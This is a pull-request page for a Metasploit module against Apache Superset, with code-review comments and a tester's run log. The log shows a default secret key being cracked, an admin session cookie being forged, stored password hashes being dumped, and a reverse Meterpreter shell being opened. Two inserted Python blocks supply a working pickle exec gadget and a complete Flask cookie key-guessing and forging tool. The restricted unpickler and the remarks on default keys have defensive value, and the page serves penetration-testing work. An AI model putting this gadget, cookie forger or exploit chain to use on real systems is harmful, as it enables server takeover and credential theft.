
Pr/collab/18351 #25

Merged
merged 3 commits into from
Oct 11, 2023

Conversation

smcintyre-r7

This makes the following changes:

  • Raises a more specific error message when failing because the internal database could not be mounted, i.e., the DATABASE option is incorrect.
  • Uses a new Python deserialization module that will execute the Python payload inline. The gadget is only compatible with Python 3, but the oldest version of Superset on PyPI only supports Python 3.6.
  • Fixes an error when res is nil because the payload is running.
  • Moves the add_equals_to_base64 function to be private by just defining it inline.

This adds a Python deserialization gadget that will exec arbitrary
Python code in place. It is only compatible with Python 3.x due to
differences in Python's exec function and statement between 2 and 3.
Check for and raise a more specific error message when the internal
database fails to mount because the path is incorrect.
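The gadget the PR description and commit message talk about, as an added example that is not the PR's own code and not the module's deserialization helper (whose name and exact opcode choices are not shown on this page): it hand-assembles the pickle opcodes so the GLOBAL/REDUCE structure that turns unpickling into builtins.exec is visible, fires it through the stock unpickler, and then shows the unpickler-side check that stops it. The marker environment variable and the demo source string are this example's own constructed choices.

```python
"""Inline-exec pickle gadget (Python 3 only) and a restricted unpickler that
blocks it. Added example, not the Metasploit module's code; the opcode layout,
the marker variable and the demo payload string are this example's choices."""
import io
import os
import pickle
import struct

MARK = "GADGET_DEMO_MARK"  # env var the constructed demo payload sets when it runs


def build_exec_gadget(python_code: str) -> bytes:
    """Pickle stream that calls builtins.exec(python_code) during unpickling.

    Stack-machine layout (every opcode here is valid in every pickle protocol):
      c builtins\\n exec\\n   GLOBAL      push the exec builtin
      (                      MARK
      X <u32 len> <utf-8>    BINUNICODE  push the source text
      t                      TUPLE       (python_code,)
      R                      REDUCE      call exec(*args), push its result
      .                      STOP        return top of stack, i.e. None

    Python 2 cannot load this: its builtins module is __builtin__ and exec is
    a statement there, not a callable, so the GLOBAL lookup fails. That is the
    reason the PR's gadget is Python 3 only.
    """
    code = python_code.encode("utf-8")
    return (
        b"cbuiltins\nexec\n"
        + b"("
        + b"X" + struct.pack("<I", len(code)) + code
        + b"t"
        + b"R"
        + b"."
    )


class RestrictedUnpickler(pickle.Unpickler):
    """Defender-side check: refuse every GLOBAL, so REDUCE has nothing to call."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing global {module}.{name}")


def loads_restricted(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


# constructed, harmless demo payload: it only sets an environment variable
DEMO_CODE = "import os; os.environ['GADGET_DEMO_MARK'] = 'fired'"


def demo() -> dict:
    blob = build_exec_gadget(DEMO_CODE)
    os.environ.pop(MARK, None)
    returned = pickle.loads(blob)      # vulnerable path: exec runs here, inline
    fired = os.environ.get(MARK)
    try:
        loads_restricted(blob)         # hardened path: rejected before exec resolves
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return {"returned": returned, "marker": fired, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

Because exec returns None, the unpickle itself yields None; the payload's effect is whatever the source text did while the stream was being loaded, which is what "executes the Python payload inline" means in the PR description. Anything that unpickles attacker-controlled bytes with the stock pickle.loads is exposed to this; overriding find_class is the minimal server-side control.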
@@ -520,7 +502,7 @@ def rce_implant
'uri' => normalize_uri(target_uri.path, 'superset', 'dashboard', 'p', permalink_key, '/')
)
# we go through some permalink hell here
until res.headers['Location'].nil?
until res.nil? || res.headers['Location'].nil?
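Review bot: the guarded condition on the last line ends the loop when res is nil, but any statement after the loop that dereferences res (res.code, res.body) needs the same nil guard or the NoMethodError just moves one line down; since the PR description says a nil res here means the payload is already running, a vprint_status to that effect when res is nil would stop operators reading it as a network failure. If the loop body (not shown) has no hop counter, a bound on the number of Location redirects followed would also keep a misbehaving permalink from spinning forever.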
Owner

good catch

@@ -273,6 +273,7 @@ def mount_internal_database
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to mount the internal database: #{datastore['DATABASE']}") if res.code == 422
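Review bot: the new check on the last line keys the "Failed to mount the internal database" message on the status code alone; including res.body (or the error field of the JSON reply) in the fail_with message would let a 422 caused by something other than a bad DATABASE path be told apart. And since the PR description attributes this case to an incorrect DATABASE option, Failure::BadConfig describes the cause more precisely than Failure::UnexpectedReply.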
Owner

I dont think I tested for this. Good to know it gives a super easy HTTP code to distinguish from!


h00die commented Oct 11, 2023

Worked for me.

msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Attempting login
[*] Grabbing CSRF token
[*] 127.0.0.1:8088 - CSRF Token: ImM5MTc2NmUxZjNiY2E0ZjJiOGIxNjY2NjNhYTM4YTdiMmU4NWU0MTki.ZSb3Og.aA5XRA2xxGs-YK80b5CWn_iA_Fo
[*] 127.0.0.1:8088 - Attempting login
[+] 127.0.0.1:8088 - Logged in Cookie: session=.eJwljztuAzEMRO-iegtJ_MqXMUiJRIIYMbBrV0HuHgGZ_r2Z-Sn3POP6KLfX-Y6j3D9XuZUVgUEGQTDXIvW6UKiBx-odaEpDx1GHtVA0ochliJUSuSZjJIMIMYUSLPEtSgcTsYqKmnMrmyohW90CZLVu0xli2pABrRxlXmfeX8-v-N575mjCHC3Bp2F2V2-8A2agJt53UWAbm3s8pz1iMxs8yvuK8_9SL79_ZflDNw.ZSb3Og.yKta6fSCX-Rdb_48hIBnerx222c;
[*] 127.0.0.1:8088 - Checking secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
[-] 127.0.0.1:8088 - Incorrect secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
[*] 127.0.0.1:8088 - Checking secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[+] 127.0.0.1:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 127.0.0.1:8088 - Modified cookie: {"_fresh"=>true, "_id"=>"dee4e5a3e53cdd58b0d47513bed2235c714b4909a1e84a75efda4405f460f64ef6377565e853d7ba3efb3a77a04848fcd58188546a0e84468a2acb63eca97931", "csrf_token"=>"c91766e1f3bca4f2b8b166663aa38a7b2e85e419", "locale"=>"en", "user_id"=>1}
[*] 127.0.0.1:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 127.0.0.1:8088 - New signed cookie: eyJfZnJlc2giOnRydWUsIl9pZCI6ImRlZTRlNWEzZTUzY2RkNThiMGQ0NzUxM2JlZDIyMzVjNzE0YjQ5MDlhMWU4NGE3NWVmZGE0NDA1ZjQ2MGY2NGVmNjM3NzU2NWU4NTNkN2JhM2VmYjNhNzdhMDQ4NDhmY2Q1ODE4ODU0NmEwZTg0NDY4YTJhY2I2M2VjYTk3OTMxIiwiY3NyZl90b2tlbiI6ImM5MTc2NmUxZjNiY2E0ZjJiOGIxNjY2NjNhYTM4YTdiMmU4NWU0MTkiLCJsb2NhbGUiOiJlbiIsInVzZXJfaWQiOjF9.ZSb3Og.nszZBIIlq-Dxl94sjrIx2hOGo68
[+] 127.0.0.1:8088 - Cookie validated to user: admin
[*] Attempting to pull user creds from db
[+] Successfully created db mapping with id: 2
[*] Creating new sqllab tab
[+] Using tab: 2
[*] Setting latest query id
[*] Harvesting superset user creds
[+] Superset Creds
==============

  Username  Password
  --------  --------
  admin     $pbkdf2-sha256$260000$R203aXBtQVh3ZUlFVmREdQ$/Sivpafs38x.LXzDbxhSsvjfZC5pKpuPONqzOWnsgrk
  user      $pbkdf2-sha256$260000$Sld1TTRIdmtEUjBDc0ViOQ$Oy7AMbeSVk4lBw7waOw08vRuzn12Px87GAzRfhEVUWA

[*] Attempting RCE
[*] Creating new dashboard
[+] New Dashboard id: 2
[*] Grabbing permalink to new dashboard to trigger payload later
[+] Dashboard permalink key: E0NwXmkv4kg
[*] Grabbing values to reset later
[*] Setting latest query id
[*] Setting latest query id
[*] Uploading payload
[*] Triggering payload
[*] Sending stage (24768 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.17.0.2:41254) at 2023-10-11 15:27:56 -0400
[*] Unsetting RCE Payloads
[*] Restoring row ID 1
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 3
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 4
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 5
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 6
[*] Setting latest query id
[+] Successfully restored
[*] Deleting dashboard
[*] Deleting sqllab tab
[*] Deleting database mapping

meterpreter > getuid
Server username: superset
meterpreter > sysinfo
Computer        : 2f7ff4a15c36
OS              : Linux 6.5.0-kali2-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03)
Architecture    : x64
System Language : C
Meterpreter     : python/linux
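The secret-key check and cookie re-signing shown in the session output above, as an added example in Python rather than the module's Ruby: it re-implements the part of itsdangerous' URLSafeTimedSerializer that Flask's session interface uses (HMAC-SHA1, salt cookie-session, "hmac" key derivation, unpadded URL-safe base64, optional zlib-compressed payload marked by a leading dot), so it can test candidate SECRET_KEY values against a captured cookie, decode the session, and re-sign it with user_id changed while keeping the original timestamp, the way the module does. The sample session dict and the candidate keys are constructed; the timestamp ZSb3Og and the login cookie in the __main__ block are the ones from the output above.

```python
"""Verify, decode and re-sign a Flask session cookie with a known SECRET_KEY.

Added example, not the Metasploit module's code. Re-implements what Flask's
SecureCookieSessionInterface asks itsdangerous for: HMAC-SHA1, salt
b"cookie-session", key_derivation="hmac", unpadded URL-safe base64."""
import base64
import hashlib
import hmac
import json
import zlib
from typing import Iterable, Optional

SALT = b"cookie-session"  # fixed salt Flask passes to itsdangerous for sessions


def b64d(s: str) -> bytes:
    # itsdangerous strips '=' padding; restore it before decoding (this is
    # the job the module's add_equals_to_base64 helper did)
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64e(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def derive_key(secret_key: str) -> bytes:
    # key_derivation="hmac": HMAC(secret, salt) with the digest method
    return hmac.new(secret_key.encode("utf-8"), SALT, hashlib.sha1).digest()


def decode_timestamp(ts: str) -> int:
    # big-endian seconds since the Unix epoch (itsdangerous >= 2.0; the 1.x
    # series subtracted a 2011-01-01 epoch, 1293840000, before encoding)
    return int.from_bytes(b64d(ts), "big")


def encode_timestamp(ts: int) -> str:
    return b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))


def decode_payload(payload: str) -> dict:
    # a leading '.' marks a zlib-compressed JSON body
    if payload.startswith("."):
        return json.loads(zlib.decompress(b64d(payload[1:])))
    return json.loads(b64d(payload))


def encode_payload(session: dict) -> str:
    # compact JSON, left uncompressed: Flask only compresses when that is
    # shorter and accepts both forms (the module's re-signed cookie above is
    # uncompressed too, which is why it starts with eyJ rather than .eJ)
    body = json.dumps(session, separators=(",", ":"), sort_keys=True)
    return b64e(body.encode("utf-8"))


def sign(secret_key: str, payload: str, timestamp: int) -> str:
    value = f"{payload}.{encode_timestamp(timestamp)}"
    sig = hmac.new(derive_key(secret_key), value.encode("ascii"), hashlib.sha1)
    return f"{value}.{b64e(sig.digest())}"


def verify(secret_key: str, cookie: str) -> bool:
    try:
        payload, ts, _sig = cookie.rsplit(".", 2)
        expected = sign(secret_key, payload, decode_timestamp(ts))
    except (ValueError, TypeError):
        return False
    return hmac.compare_digest(expected, cookie)


def find_secret_key(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """The module's 'Checking secret key' loop: first key that validates wins."""
    for key in candidates:
        if verify(key, cookie):
            return key
    return None


def forge(secret_key: str, cookie: str, **changes) -> str:
    """Re-sign the cookie with updated session fields, keeping its timestamp."""
    payload, ts, _sig = cookie.rsplit(".", 2)
    session = decode_payload(payload)
    session.update(changes)
    return sign(secret_key, encode_payload(session), decode_timestamp(ts))


if __name__ == "__main__":
    # login cookie and key from the module output above
    KEY = "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"
    PAGE_COOKIE = (
        ".eJwljztuAzEMRO-iegtJ_MqXMUiJRIIYMbBrV0HuHgGZ_r2Z-Sn3POP6KLfX-Y6j3D9XuZUVgUEGQTDXIvW6UKiBx-odaEpDx1GHtVA0ochliJUSuSZjJIMIMYUSLPEtSgcTsYqKmnMrmyohW90CZLVu0xli2pABrRxlXmfeX8-v-N575mjCHC3Bp2F2V2-8A2agJt53UWAbm3s8pz1iMxs8yvuK8_9SL79_ZflDNw"
        ".ZSb3Og.yKta6fSCX-Rdb_48hIBnerx222c"
    )
    print("timestamp:", decode_timestamp("ZSb3Og"))
    print("key valid:", verify(KEY, PAGE_COOKIE))
    print("forged:", forge(KEY, PAGE_COOKIE, user_id=1))
```

Two points the code makes explicit: the timestamp is signed but never checked for freshness by Flask unless the application sets PERMANENT_SESSION_LIFETIME and max_age, so reusing the original one (as the module's re-signed cookie above does) is fine; and the whole scheme rests on SECRET_KEY alone, so a default or guessable key is equivalent to handing out admin sessions. The candidate-key loop is the same brute force the module logs as "Checking secret key".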

@h00die h00die merged commit 862a793 into h00die:superset_rce Oct 11, 2023
32 checks passed